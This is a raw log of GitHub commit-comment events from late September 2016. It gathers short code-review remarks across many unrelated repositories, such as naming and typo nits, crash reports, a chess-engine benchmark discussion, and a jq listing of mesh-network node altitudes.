{"id":"4639484567","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229827,"position":4,"line":4,"path":"vdiexperience/background.js","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:41:00Z","updated_at":"2016-09-29T19:41:00Z","body":"This file `content_script.js` should be name `agent.js`."}},"created_at":"2016-09-29T19:41:00Z"}
{"id":"4639484938","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19229828,"position":6,"line":67,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/common/Commons.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T19:41:04Z","updated_at":"2016-09-29T19:41:04Z","body":"Variable names are inspired by lines 63 and 64 and used in many test cases, so we should keep the naming conventions.  "}},"created_at":"2016-09-29T19:41:04Z"}
{"id":"4639486097","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229832,"position":12,"line":12,"path":"vdiexperience/background.js","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:41:17Z","updated_at":"2016-09-29T19:41:17Z","body":"If fail to see the purpose of this comment"}},"created_at":"2016-09-29T19:41:17Z"}
{"id":"4639487659","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19229835,"position":6,"line":1297,"path":"chat-plugins/info.js","commit_id":"6b077d94532170ff0d9617e2fb04738c4e607592","created_at":"2016-09-29T19:41:34Z","updated_at":"2016-09-29T19:41:34Z","body":"It still crashes on this line :|"}},"created_at":"2016-09-29T19:41:34Z"}
{"id":"4639487675","type":"CommitCommentEvent","actor":{"login":"visi0nary"},"repo":{"name":"AlexLartsev19/blood_kernel_meizu_m2note"},"payload":{"comment":{"id":19229837,"position":null,"line":null,"path":null,"commit_id":"91d4af3a857f9e1df4b7f18b6324bfc479c7adb4","created_at":"2016-09-29T19:41:34Z","updated_at":"2016-09-29T19:41:34Z","body":"Hey,\r\n\r\nI am sorry to disappoint but this will likely do nothing. MTK SoCs have their frequencies hard coded into the hardware mostly. :/"}},"created_at":"2016-09-29T19:41:34Z"}
{"id":"4639488066","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19229838,"position":null,"line":null,"path":null,"commit_id":"b06280cc81180a63a8b0cf9693e73c67583bfc43","created_at":"2016-09-29T19:41:39Z","updated_at":"2016-09-29T19:41:39Z","body":"fix it http://translators.xiaomi.eu/XML_MIUI8-Turkish-tr.html"}},"created_at":"2016-09-29T19:41:39Z"}
{"id":"4639490736","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19229841,"position":6,"line":1297,"path":"chat-plugins/info.js","commit_id":"6b077d94532170ff0d9617e2fb04738c4e607592","created_at":"2016-09-29T19:42:09Z","updated_at":"2016-09-29T19:42:09Z","body":"Want me to PR, or do you have it?"}},"created_at":"2016-09-29T19:42:09Z"}
{"id":"4639490868","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19229842,"position":4,"line":225,"path":"common/src/main/java/com/frostwire/bittorrent/BTDownload.java","commit_id":"c6baf68e59f7823658ffe35097dd29113a6afe2e","created_at":"2016-09-29T19:42:10Z","updated_at":"2016-09-29T19:42:10Z","body":"I don't think that's possible"}},"created_at":"2016-09-29T19:42:10Z"}
{"id":"4639491131","type":"CommitCommentEvent","actor":{"login":"luizgsbraz"},"repo":{"name":"luizgsbraz/Products.CMFPlone"},"payload":{"comment":{"id":19229843,"position":null,"line":null,"path":null,"commit_id":"73e1303af8e86cc8fe86b9445a13e1997aae3172","created_at":"2016-09-29T19:42:13Z","updated_at":"2016-09-29T19:42:13Z","body":"In fact, it affects brasil.gov.tema as reported here.\r\nhttps://github.com/plonegovbr/brasil.gov.temas/issues/131\r\n"}},"created_at":"2016-09-29T19:42:13Z"}
{"id":"4639493659","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229846,"position":5,"line":5,"path":"vdiexperience/manifest.json","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:42:42Z","updated_at":"2016-09-29T19:42:42Z","body":"extention -> extension"}},"created_at":"2016-09-29T19:42:42Z"}
{"id":"4639494407","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229847,"position":5,"line":5,"path":"vdiexperience/manifest.json","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:42:51Z","updated_at":"2016-09-29T19:42:51Z","body":"offer -> offers"}},"created_at":"2016-09-29T19:42:51Z"}
{"id":"4639494555","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19229848,"position":null,"line":null,"path":null,"commit_id":"8788d2dfac25e6f35c1f1373ca6764ea25e2481d","created_at":"2016-09-29T19:42:52Z","updated_at":"2016-09-29T19:42:52Z","body":"This sequence of 5 commits is a good example of when it can be good to fix things locally, rewrite history (and hide the mistakes), before you \"push\" to the server for everyone to see. The ability to do so is one of the strengths of git.\r\n\r\nBut you got there in the end  - so well done :)"}},"created_at":"2016-09-29T19:42:52Z"}
{"id":"4639495143","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19229849,"position":37,"line":37,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/fm/core/io/xml/TXMLFeatureModelReaderWriter.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T19:43:00Z","updated_at":"2016-09-29T19:43:00Z","body":"Description is not missing in the current version of the branch."}},"created_at":"2016-09-29T19:43:00Z"}
{"id":"4639497330","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19229854,"position":71,"line":1095,"path":"android/apollo/src/com/andrew/apollo/utils/MusicUtils.java","commit_id":"4cfcf50cd6ffb578e2c4f0e5f79ded044e25310e","created_at":"2016-09-29T19:43:25Z","updated_at":"2016-09-29T19:43:25Z","body":"fixing it"}},"created_at":"2016-09-29T19:43:25Z"}
{"id":"4639497337","type":"CommitCommentEvent","actor":{"login":"mikem23"},"repo":{"name":"xning/koji"},"payload":{"comment":{"id":19229855,"position":27,"line":971,"path":"builder/kojid","commit_id":"0cfdb4f97980b53eda54a69062e3628e00120d41","created_at":"2016-09-29T19:43:25Z","updated_at":"2016-09-29T19:43:25Z","body":"This is going to give an incorrect result if the rpm is supposed to build for noarch AND other arches. Several do this, notably the kernel.\r\n\r\nSupporting this case is going to require changes to more than just this function. This function is returning a list of arches to build FOR, not the arch to use for the buildroot. "}},"created_at":"2016-09-29T19:43:25Z"}
{"id":"4639503746","type":"CommitCommentEvent","actor":{"login":"LilineB"},"repo":{"name":"ManonHc/Anglais"},"payload":{"comment":{"id":19229864,"position":null,"line":null,"path":null,"commit_id":"d5c579caf86497494656cf1568f04eee2a57adc8","created_at":"2016-09-29T19:44:35Z","updated_at":"2016-09-29T19:44:35Z","body":"heu... plutot spelling game"}},"created_at":"2016-09-29T19:44:35Z"}
{"id":"4639508071","type":"CommitCommentEvent","actor":{"login":"RavenX8"},"repo":{"name":"RavenX8/osIROSE-new"},"payload":{"comment":{"id":19229870,"position":4,"line":51,"path":"src/core/include/cnetwork_asio.h","commit_id":"1fdc38bed5f7e7010ab0841ad1bc2bb22587ddd8","created_at":"2016-09-29T19:45:22Z","updated_at":"2016-09-29T19:45:22Z","body":"This shouldn't be here"}},"created_at":"2016-09-29T19:45:22Z"}
{"id":"4639510355","type":"CommitCommentEvent","actor":{"login":"hojac"},"repo":{"name":"ffac/site"},"payload":{"comment":{"id":19229871,"position":null,"line":null,"path":null,"commit_id":"3421cde9b7b662db20342709ad1d2f7e92dcc0ff","created_at":"2016-09-29T19:45:48Z","updated_at":"2016-09-29T19:45:48Z","body":"Ich war eh der einzige der da was rein geschrieben hat... Oder? ;-)"}},"created_at":"2016-09-29T19:45:48Z"}
{"id":"4639513823","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229881,"position":3,"line":3,"path":"vdiexperience/content_script.js","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:46:26Z","updated_at":"2016-09-29T19:46:26Z","body":"What is the purpose of this function ?"}},"created_at":"2016-09-29T19:46:26Z"}
{"id":"4639517549","type":"CommitCommentEvent","actor":{"login":"adakac"},"repo":{"name":"adakac/Project-A"},"payload":{"comment":{"id":19229892,"position":null,"line":null,"path":null,"commit_id":"42a0af19d0931508204d3356a1412c753ba3f5d6","created_at":"2016-09-29T19:47:07Z","updated_at":"2016-09-29T19:47:07Z","body":"Added our GPLv3 licence."}},"created_at":"2016-09-29T19:47:07Z"}
{"id":"4639517627","type":"CommitCommentEvent","actor":{"login":"mlafeldt"},"repo":{"name":"tests-always-included/tomdoc.sh"},"payload":{"comment":{"id":19229893,"position":null,"line":null,"path":null,"commit_id":"8ac79d3011fc740f276cd2b757857b9c8a2050d6","created_at":"2016-09-29T19:47:08Z","updated_at":"2016-09-29T19:47:08Z","body":"FWIW: I always turn to `printf` when it comes to portable output."}},"created_at":"2016-09-29T19:47:08Z"}
{"id":"4639518012","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19229894,"position":6,"line":1297,"path":"chat-plugins/info.js","commit_id":"6b077d94532170ff0d9617e2fb04738c4e607592","created_at":"2016-09-29T19:47:12Z","updated_at":"2016-09-29T19:47:12Z","body":"...I have the fix but can't hotpatch because the CommandParser refactor is nonhotpatchable..."}},"created_at":"2016-09-29T19:47:12Z"}
{"id":"4639519004","type":"CommitCommentEvent","actor":{"login":"mdekstrand"},"repo":{"name":"BoiseState/tools"},"payload":{"comment":{"id":19229897,"position":null,"line":null,"path":null,"commit_id":"8a0e22c2aaae5e8f564a51d57055ef2ecdf6ae71","created_at":"2016-09-29T19:47:22Z","updated_at":"2016-09-29T19:47:22Z","body":"@boiseamit have you seen [git-radar](https://github.com/michaeldfallen/git-radar)? It's a nifty pre-written script that generates all sorts of useful info for your bash prompt."}},"created_at":"2016-09-29T19:47:22Z"}
{"id":"4639524358","type":"CommitCommentEvent","actor":{"login":"mmalte"},"repo":{"name":"ffac/site"},"payload":{"comment":{"id":19229903,"position":null,"line":null,"path":null,"commit_id":"3421cde9b7b662db20342709ad1d2f7e92dcc0ff","created_at":"2016-09-29T19:48:20Z","updated_at":"2016-09-29T19:48:20Z","body":"jq . /opt/freifunk/data/nodes-unfiltered.json | grep altitude\r\n          \"altitude\": 111\r\n          \"altitude\": 96\r\n          \"altitude\": 140\r\n          \"altitude\": 168\r\n          \"altitude\": 265\r\n          \"altitude\": 138.88999999999996\r\n          \"altitude\": 286\r\n          \"altitude\": 271\r\n          \"altitude\": 263\r\n          \"altitude\": 354\r\n          \"altitude\": 487\r\n          \"altitude\": 263\r\n          \"altitude\": 227\r\n          \"altitude\": 250\r\n          \"altitude\": 193\r\n          \"altitude\": 275\r\n          \"altitude\": 356\r\n          \"altitude\": 193\r\n          \"altitude\": 275\r\n          \"altitude\": 243\r\n          \"altitude\": 393\r\n          \"altitude\": 257\r\n          \"altitude\": 263\r\n          \"altitude\": 17\r\n          \"altitude\": 100\r\n          \"altitude\": 100\r\n          \"altitude\": 110\r\n          \"altitude\": 18\r\n          \"altitude\": 120\r\n          \"altitude\": 120\r\n          \"altitude\": 161\r\n          \"altitude\": 138\r\n          \"altitude\": 0\r\n          \"altitude\": 80\r\n          \"altitude\": 75\r\n          \"altitude\": 222\r\n          \"altitude\": 88\r\n          \"altitude\": 161\r\n          \"altitude\": 109\r\n          \"altitude\": 79\r\n          \"altitude\": 122\r\n          \"altitude\": 80\r\n          \"altitude\": 77\r\n          \"altitude\": 80\r\n          \"altitude\": 82\r\n          \"altitude\": 75\r\n          \"altitude\": 85\r\n          \"altitude\": 79\r\n          \"altitude\": 271\r\n          \"altitude\": 180\r\n          \"altitude\": 101\r\n          \"altitude\": 520\r\n          \"altitude\": 120\r\n          \"altitude\": 97\r\n          \"altitude\": 74\r\n          \"altitude\": 80\r\n          \"altitude\": 80\r\n          \"altitude\": 10\r\n          \"altitude\": 78\r\n          \"altitude\": 101\r\n          \"altitude\": 80.8\r\n          \"altitude\": 3\r\n          \"altitude\": 1\r\n          \"altitude\": 144\r\n          \"altitude\": 109\r\n          \"altitude\": 142\r\n          \"altitude\": 77\r\n          \"altitude\": 3\r\n          \"altitude\": 130\r\n          \"altitude\": 4\r\n          \"altitude\": 74\r\n          \"altitude\": 164\r\n          \"altitude\": 148\r\n          \"altitude\": 190\r\n          \"altitude\": 3.5\r\n          \"altitude\": 162\r\n          \"altitude\": 6\r\n          \"altitude\": 2.5\r\n          \"altitude\": 80\r\n          \"altitude\": 153\r\n          \"altitude\": 75\r\n          \"altitude\": 125\r\n          \"altitude\": 125\r\n          \"altitude\": 33.6\r\n          \"altitude\": 35\r\n          \"altitude\": 4\r\n          \"altitude\": 35\r\n          \"altitude\": 35\r\n          \"altitude\": 132\r\n          \"altitude\": 100.9\r\n          \"altitude\": 87\r\n          \"altitude\": 100\r\n          \"altitude\": 51\r\n          \"altitude\": 90\r\n          \"altitude\": 109\r\n          \"altitude\": 90\r\n          \"altitude\": 54.5\r\n          \"altitude\": 100\r\n          \"altitude\": 126\r\n          \"altitude\": 100\r\n          \"altitude\": 100\r\n          \"altitude\": 138\r\n          \"altitude\": 100\r\n          \"altitude\": 126\r\n          \"altitude\": 115\r\n          \"altitude\": 5\r\n          \"altitude\": 5\r\n          \"altitude\": 117\r\n          \"altitude\": 119\r\n          \"altitude\": 132\r\n          \"altitude\": 100\r\n          \"altitude\": 90\r\n          \"altitude\": 132\r\n          \"altitude\": 6.327363253\r\n          \"altitude\": 100\r\n          \"altitude\": 92\r\n          \"altitude\": 90\r\n          \"altitude\": 92\r\n          \"altitude\": 17\r\n          \"altitude\": 98\r\n          \"altitude\": 286\r\n          \"altitude\": 286\r\n          \"altitude\": 286\r\n          \"altitude\": 118\r\n          \"altitude\": 250\r\n          \"altitude\": 0\r\n          \"altitude\": 176\r\n          \"altitude\": 75\r\n          \"altitude\": 86\r\n          \"altitude\": 166\r\n          \"altitude\": 54\r\n          \"altitude\": 17\r\n          \"altitude\": 110\r\n          \"altitude\": 8\r\n          \"altitude\": 36\r\n          \"altitude\": 98\r\n          \"altitude\": 480\r\n          \"altitude\": 480\r\n          \"altitude\": 358.8\r\n          \"altitude\": 288\r\n          \"altitude\": 282\r\n          \"altitude\": 450\r\n          \"altitude\": 80\r\n          \"altitude\": 77\r\n          \"altitude\": 161\r\n          \"altitude\": 80\r\n          \"altitude\": 437\r\n          \"altitude\": 144\r\n          \"altitude\": 50\r\n          \"altitude\": 50\r\n          \"altitude\": 256\r\n          \"altitude\": 17\r\n          \"altitude\": 159\r\n          \"altitude\": 0\r\n          \"altitude\": 694\r\n          \"altitude\": 694\r\n          \"altitude\": 234\r\n          \"altitude\": 120\r\n          \"altitude\": 57\r\n          \"altitude\": 179\r\n          \"altitude\": 200\r\n          \"altitude\": 1\r\n          \"altitude\": 126\r\n          \"altitude\": 450\r\n          \"altitude\": 176\r\n          \"altitude\": 193\r\n          \"altitude\": 36\r\n          \"altitude\": 5\r\n          \"altitude\": 150\r\n          \"altitude\": 100\r\n          \"altitude\": 120.51\r\n          \"altitude\": 176\r\n          \"altitude\": 328\r\n          \"altitude\": 3.5\r\n          \"altitude\": 180\r\n          \"altitude\": 69\r\n          \"altitude\": 154\r\n          \"altitude\": 10\r\n          \"altitude\": 77.03\r\n          \"altitude\": 299\r\n          \"altitude\": 327\r\n          \"altitude\": 10\r\n          \"altitude\": 138.5\r\n          \"altitude\": 10\r\n          \"altitude\": 177\r\n          \"altitude\": 60.2\r\n          \"altitude\": 180\r\n          \"altitude\": 206\r\n          \"altitude\": 90\r\n          \"altitude\": 438\r\n          \"altitude\": 420\r\n          \"altitude\": 430\r\n          \"altitude\": 92\r\n          \"altitude\": 100\r\n          \"altitude\": 7\r\n          \"altitude\": 3\r\n          \"altitude\": 80\r\n          \"altitude\": 220\r\n          \"altitude\": 176\r\n          \"altitude\": 41.7\r\n          \"altitude\": 3\r\n          \"altitude\": 10\r\n          \"altitude\": 42.9\r\n          \"altitude\": 5\r\n          \"altitude\": 211\r\n          \"altitude\": 165\r\n          \"altitude\": 79.1\r\n          \"altitude\": 10\r\n          \"altitude\": 1\r\n          \"altitude\": 80\r\n          \"altitude\": 1\r\n          \"altitude\": 286\r\n          \"altitude\": 1337\r\n          \"altitude\": 68\r\n          \"altitude\": 180.75\r\n          \"altitude\": 80\r\n          \"altitude\": 87\r\n\r\n\r\nWaren schon ein paar mehr, aber wie man sieht in sehr unterschiedlichen Bezugssystemen"}},"created_at":"2016-09-29T19:48:20Z"}
{"id":"4639524509","type":"CommitCommentEvent","actor":{"login":"Blaccexican"},"repo":{"name":"Blaccexican/domains"},"payload":{"comment":{"id":19229904,"position":21,"line":21,"path":".gitignore","commit_id":"c08bc296d8918550342ba03400a87db32676af64","created_at":"2016-09-29T19:48:22Z","updated_at":"2016-09-29T19:48:22Z","body":"Chrome"}},"created_at":"2016-09-29T19:48:22Z"}
{"id":"4639525959","type":"CommitCommentEvent","actor":{"login":"selltc"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":19229908,"position":null,"line":null,"path":null,"commit_id":"8e96f804e1abeaea218797d787b294e4512b9fdb","created_at":"2016-09-29T19:48:36Z","updated_at":"2016-09-29T19:48:36Z","body":"> Should I change the error handling as a separate patch? Or should I combine the two?\r\nSo if you can easily get by with a void return here, and adding the int value in a subsequent patch, that would be preferable.  But if it's not easy, then you might have to combine them.\r\n\r\nThanks for the explanation about the errno values versus controlvm responses.  I suspect you should have a note about that in the commit message, indicating that a fix is forthcoming. "}},"created_at":"2016-09-29T19:48:36Z"}
{"id":"4639526532","type":"CommitCommentEvent","actor":{"login":"Blaccexican"},"repo":{"name":"Blaccexican/domains"},"payload":{"comment":{"id":19229909,"position":1,"line":1,"path":"README.md","commit_id":"c08bc296d8918550342ba03400a87db32676af64","created_at":"2016-09-29T19:48:42Z","updated_at":"2016-09-29T19:48:42Z","body":"Not sute"}},"created_at":"2016-09-29T19:48:42Z"}
{"id":"4639527838","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19229911,"position":null,"line":null,"path":null,"commit_id":"8c1546831629da0444b02257190e6921e78cefac","created_at":"2016-09-29T19:48:56Z","updated_at":"2016-09-29T19:48:56Z","body":"Nope! everything looks fine and works perfectly"}},"created_at":"2016-09-29T19:48:56Z"}
{"id":"4639533746","type":"CommitCommentEvent","actor":{"login":"Blaccexican"},"repo":{"name":"Blaccexican/domains"},"payload":{"comment":{"id":19229918,"position":2,"line":2,"path":".gitignore","commit_id":"c08bc296d8918550342ba03400a87db32676af64","created_at":"2016-09-29T19:49:58Z","updated_at":"2016-09-29T19:49:58Z","body":"BL"}},"created_at":"2016-09-29T19:49:58Z"}
{"id":"4639534573","type":"CommitCommentEvent","actor":{"login":"Blaccexican"},"repo":{"name":"Blaccexican/domains"},"payload":{"comment":{"id":19229919,"position":8,"line":8,"path":".gitignore","commit_id":"c08bc296d8918550342ba03400a87db32676af64","created_at":"2016-09-29T19:50:08Z","updated_at":"2016-09-29T19:50:08Z","body":"Bl"}},"created_at":"2016-09-29T19:50:08Z"}
{"id":"4639534708","type":"CommitCommentEvent","actor":{"login":"duaraghav8"},"repo":{"name":"duaraghav8/solparse"},"payload":{"comment":{"id":19229920,"position":null,"line":null,"path":null,"commit_id":"df93768cacb7dd9a1acc172ba239197dcf927a10","created_at":"2016-09-29T19:50:09Z","updated_at":"2016-09-29T19:50:09Z","body":"#8 "}},"created_at":"2016-09-29T19:50:09Z"}
{"id":"4639536969","type":"CommitCommentEvent","actor":{"login":"neuhaus"},"repo":{"name":"itfelstead/ricoh-theta-autoit"},"payload":{"comment":{"id":19229922,"position":null,"line":null,"path":null,"commit_id":"02d40234b711743960afb6e03d5614815e53245b","created_at":"2016-09-29T19:50:32Z","updated_at":"2016-09-29T19:50:32Z","body":"OK, let me figure out how we can do this..."}},"created_at":"2016-09-29T19:50:32Z"}
{"id":"4639538201","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19229926,"position":6,"line":1297,"path":"chat-plugins/info.js","commit_id":"6b077d94532170ff0d9617e2fb04738c4e607592","created_at":"2016-09-29T19:50:45Z","updated_at":"2016-09-29T19:50:45Z","body":"that's awkward\r\n\r\n... is there a planned restart sometime in the near future?"}},"created_at":"2016-09-29T19:50:45Z"}
{"id":"4639540710","type":"CommitCommentEvent","actor":{"login":"Desnoo"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19229933,"position":null,"line":null,"path":null,"commit_id":"c877539a65e68e7827b011e9c14eb093fc01fff8","created_at":"2016-09-29T19:51:11Z","updated_at":"2016-09-29T19:51:11Z","body":"if commands in bash are written as if [ expression ]; then  <your scripting stuff>; fi \r\nDont forget the spaces inside the if clause :D\r\nI think this is the case when the whole stuff is written as one liner/inline."}},"created_at":"2016-09-29T19:51:11Z"}
{"id":"4639541189","type":"CommitCommentEvent","actor":{"login":"jaredjstewart"},"repo":{"name":"jaredjstewart/incubator-geode"},"payload":{"comment":{"id":19229935,"position":null,"line":null,"path":null,"commit_id":"6fb64a7b671af3054a38610c245f51ab9c30c342","created_at":"2016-09-29T19:51:17Z","updated_at":"2016-09-29T19:51:17Z","body":"Some of the changes to QueryDataFunction are simply formatting changes to make the source file agree with the coding style of Apache Geode.  "}},"created_at":"2016-09-29T19:51:17Z"}
{"id":"4639556769","type":"CommitCommentEvent","actor":{"login":"VampyrBytes"},"repo":{"name":"ParadiseSS13/Paradise"},"payload":{"comment":{"id":19229960,"position":6,"line":197,"path":"code/modules/mob/living/carbon/human/human.dm","commit_id":"d0db8c9bffdae1857c3ae79448bdc8aca886b867","created_at":"2016-09-29T19:54:07Z","updated_at":"2016-09-29T19:54:07Z","body":"This makes me want to cry!\r\n\r\nIf(!something == !something) is the same as if(something == something) but far less readable"}},"created_at":"2016-09-29T19:54:07Z"}
{"id":"4639558122","type":"CommitCommentEvent","actor":{"login":"Kingdefender"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19229965,"position":null,"line":null,"path":null,"commit_id":"eccccba0ce4e2d627cbe2adb1bf4a692d595ca99","created_at":"2016-09-29T19:54:22Z","updated_at":"2016-09-29T19:54:22Z","body":"This is all true of course. Any value above 554 can trigger the condition. But the question is if it really matters at LTC.  At STC you could use different margins and pass [-1.5, 4.5], but not LTC.\r\nThe patch from Michel was good though, no doubt about that. But the razor margin for 3 plies was different, I'm assuming that was in the original, three full plies razor margin, depth == 6 . Digging up an old formula from around 2010\r\n```   // Dynamic razoring margin based on depth\r\n  inline Value razor_margin(Depth d) { return Value(0x200 + 0x10 * int(d)); }```\r\nI'm not sure that was still in use when the patch was tested, later than 2010 I'm sure of that, but if it was then still with d==6 for three full plies this formula gives me a margin of 608 decimal. Slightly more than what it is now. Maybe it can be tried if with 600 you get a bit better results again. It is a functional change:\r\n\r\nValue(700) \r\n ===========================\r\nTotal time (ms) : 3141\r\nNodes searched  : 5801393\r\nNodes/second    : 1846989 \r\n\r\nValue(600)\r\n===========================\r\nTotal time (ms) : 2968\r\nNodes searched  : 5485598\r\nNodes/second    : 1848247\r\n\r\nValue(550) \r\n===========================\r\nTotal time (ms) : 3332\r\nNodes searched  : 6335042 No functional change because <= 554\r\nNodes/second    : 1901273\r\n"}},"created_at":"2016-09-29T19:54:22Z"}
{"id":"4639559104","type":"CommitCommentEvent","actor":{"login":"mjm-cycronix"},"repo":{"name":"cycronix/cloudturbine"},"payload":{"comment":{"id":19229967,"position":null,"line":null,"path":null,"commit_id":"32ec48e15ac3d36f971c4d42f9995507269f5a9f","created_at":"2016-09-29T19:54:33Z","updated_at":"2016-09-29T19:54:33Z","body":"Good catch!"}},"created_at":"2016-09-29T19:54:33Z"}
{"id":"4639563865","type":"CommitCommentEvent","actor":{"login":"ivabogdanova"},"repo":{"name":"ivabogdanova/ProgrammingAssignment2"},"payload":{"comment":{"id":19229978,"position":null,"line":null,"path":null,"commit_id":"e405fbf843047033c89695a56b8ee66e6f2cd752","created_at":"2016-09-29T19:55:28Z","updated_at":"2016-09-29T19:55:28Z","body":"Programming Assignment 2: Caching the inverse of a matrix"}},"created_at":"2016-09-29T19:55:28Z"}
{"id":"4639564151","type":"CommitCommentEvent","actor":{"login":"Desnoo"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19229981,"position":null,"line":null,"path":null,"commit_id":"6ca7612e584355af6db0bf4a55838997af70b3bd","created_at":"2016-09-29T19:55:31Z","updated_at":"2016-09-29T19:55:31Z","body":"I think so, only if the response does not deliver a data key inside of the response (I mean the data key inside the root data key :D).  then the further processing after this step will fail I think."}},"created_at":"2016-09-29T19:55:31Z"}
{"id":"4639564961","type":"CommitCommentEvent","actor":{"login":"AndreaOrru"},"repo":{"name":"polypmer/fenestrate"},"payload":{"comment":{"id":19229984,"position":null,"line":null,"path":null,"commit_id":"73b09eeb8150de64554b3b9de7ebcea14a430898","created_at":"2016-09-29T19:55:40Z","updated_at":"2016-09-29T19:55:40Z","body":"Happy to help :)"}},"created_at":"2016-09-29T19:55:40Z"}
{"id":"4639565712","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"pmt-mcpe-me/pmt.mcpe.me-source"},"payload":{"comment":{"id":19229986,"position":15,"line":14,"path":"phar.php","commit_id":"deb2b16eff015d6cd8e2ca23315f204f8d1b6d27","created_at":"2016-09-29T19:55:49Z","updated_at":"2016-09-29T19:55:49Z","body":"are the comments here accidental?"}},"created_at":"2016-09-29T19:55:49Z"}
{"id":"4639569971","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"pmt-mcpe-me/pmt.mcpe.me-source"},"payload":{"comment":{"id":19229997,"position":15,"line":14,"path":"phar.php","commit_id":"deb2b16eff015d6cd8e2ca23315f204f8d1b6d27","created_at":"2016-09-29T19:56:37Z","updated_at":"2016-09-29T19:56:37Z","body":"could they fix #35 ?"}},"created_at":"2016-09-29T19:56:37Z"}
{"id":"4639580283","type":"CommitCommentEvent","actor":{"login":"mojilat"},"repo":{"name":"mojilat/-"},"payload":{"comment":{"id":19230024,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T19:58:30Z","updated_at":"2016-09-29T19:58:30Z","body":"Mojilat"}},"created_at":"2016-09-29T19:58:30Z"}
{"id":"4634589248","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"dcfigueiredo/crescer-2016-2"},"payload":{"comment":{"id":19217717,"position":null,"line":null,"path":null,"commit_id":"0fe384023be30b9ca6c2fe056ccf6667c93e0f71","created_at":"2016-09-29T02:00:01Z","updated_at":"2016-09-29T02:00:01Z","body":"⚠️ ⚠️ ⚠️ \r\n\r\nIsso não era pra ser feito. Foque nos exercícios da lista: https://gist.github.com/bernardobrezende/1634e83d956624d5df0ed3e92f2adcc6"}},"created_at":"2016-09-29T02:00:01Z"}
{"id":"4634592439","type":"CommitCommentEvent","actor":{"login":"antmdvs"},"repo":{"name":"aspnet/JavaScriptServices"},"payload":{"comment":{"id":19217726,"position":1,"line":4,"path":"templates/ReactSpa/package.json","commit_id":"b4bec30b0f1610f759bb5dd369a24bd26484ba86","created_at":"2016-09-29T02:00:54Z","updated_at":"2016-09-29T02:00:54Z","body":"Is this one supposed to be \"dependencies\" not \"devDependencies\"?"}},"created_at":"2016-09-29T02:00:54Z"}
{"id":"4634594783","type":"CommitCommentEvent","actor":{"login":"guo935809915"},"repo":{"name":"guo935809915/Car"},"payload":{"comment":{"id":19217731,"position":9,"line":9,"path":"CarActivity.java","commit_id":"94ab206d16396a7021cc93c7dac0fd0046358d7e","created_at":"2016-09-29T02:01:38Z","updated_at":"2016-09-29T02:01:38Z","body":"hehe"}},"created_at":"2016-09-29T02:01:38Z"}
{"id":"4634596243","type":"CommitCommentEvent","actor":{"login":"jsgit101"},"repo":{"name":"jsgit101/hello-world"},"payload":{"comment":{"id":19217735,"position":1,"line":1,"path":"master-file","commit_id":"791c517bf9be248ae6a2da82da6b12ddeb320f65","created_at":"2016-09-29T02:02:08Z","updated_at":"2016-09-29T02:02:08Z","body":"why this line is being removed?"}},"created_at":"2016-09-29T02:02:08Z"}
